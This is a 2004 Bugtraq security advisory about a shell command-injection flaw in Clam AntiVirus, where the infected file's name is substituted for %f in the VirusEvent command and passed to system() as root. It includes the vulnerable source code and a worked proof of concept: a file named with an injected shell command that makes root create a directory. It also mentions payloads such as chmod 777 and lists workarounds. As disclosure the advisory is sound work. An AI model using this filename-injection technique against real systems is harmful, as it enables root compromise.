List: bugtraq
Subject: clamd - NEVER use "%f" in your "VirusEvent"
From: Rene <l0om () excluded ! org>
Date: 2004-03-30 12:34:18
Message-ID: 20040330123418.12944.qmail () search ! securityfocus ! com
date: 30 March 2004
product: clam antivirus
author: l0om - l0om[at]excluded.org - www.excluded.org
#####################################################################
clam antivirus is an antivirus program (which works very well). it comes with a lot of features and is easy to handle. normally you start it from the command line on demand, but if you use the dazuko module you can also scan in realtime. by default the program runs as root, but you can drop its privileges if you want to.
in the clamav.conf we can find the "VirusEvent" directive (which is disabled by default):
# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
# eg. by using some special file name when %f is used.
# Always use a full path to the command.
# Never delete/move files with this directive !
# VirusEvent /usr/bin/send_sms 1214131 "VIRUS DETECTED: %f: %v"
"Make sure the virus event command cannot be exploited, eg. by using some special file name when %f is used."
this is not enough. they should remove this "%f" feature for security reasons because, in my opinion, for now you nearly can't prevent the "%f" substitution from breaking out of your VirusEvent and doing whatever the attacker likes.
#####################################################################
void virusaction(const char *filename, const char *virname, const struct cfgstruct *copt) {
[...]
    buffer = (char *) mcalloc(strlen(cmd) + strlen(filename) + strlen(virname) + 10, sizeof(char));

    if((pt = strstr(cmd, "%f"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);          <----
        strcat(buffer, filename);     <----
        strcat(buffer, pt);           <----
        free(cmd);
        cmd = strdup(buffer);
    }

    if((pt = strstr(cmd, "%v"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);
        strcat(buffer, virname);
        strcat(buffer, pt);
        free(cmd);
        cmd = strdup(buffer);
    }

    free(buffer);
    /* WARNING: this is uninterruptable ! */
    system(cmd);                      <------------------------------------------
    free(cmd);
}
#####################################################################
as we can see in the source code, there is no filter for shell characters like ";" or " in the program. therefore an attacker may take a look at your VirusEvent (as your clamav.conf is world-readable), create a file named " ; chmod 777 etc" for example, and put some virus in it. as we can see above, clamd hands the assembled buffer to system(), which runs it through the shell. the attacker can't use paths containing "/" in the file name, but he has what it takes to get root or kill the system.
the commands will be executed by clamd in "/", as the process makes a chdir("/").
#####################################################################
example:
l0om:~> ls -l /usr/local/etc/clamav.conf
-rw-r--r-- 1 root root 6863 2004-03-27 11:27 /usr/local/etc/clamav.conf
l0om:~> cat /usr/local/etc/clamav.conf
[...]
# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
# eg. by using some special file name when %f is used.
# Always use a full path to the command.
# Never delete/move files with this directive !
VirusEvent /bin/echo "Virus: %f: %v" | /usr/bin/mail -s "VIRUS ALERT" admin@network.net
# Run as selected user (clamd must be started by root).
# By default it doesn't drop privileges.
#User clamav
[...]
l0om:~> cat >" \"; mkdir owned; echo \""
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
l0om:~> ls
"; mkdir owned; echo " XXX.blow_balls_4_real.mpeg XxX.admin_and_amanda_backup_deamon_having_fun.avi
# with realtime scanning the file will be scanned when we close it or open it for reading.
# [...otherwise: on the next virus scan]
l0om:~> ls -ld /owned
drwxrwxrwx 2 root root 48 2004-03-30 11:29 owned
#####################################################################
workaround:
- don't use the VirusEvent
- don't use "%f" in the VirusEvent(!)
- trigger events with your own script that parses clamd's log file instead
######################################################################
have phun everybody!
anyone at the NoFX concert or the deconstruction tour in Köln? PARTY ON!
-- l0om
-- www.excluded.org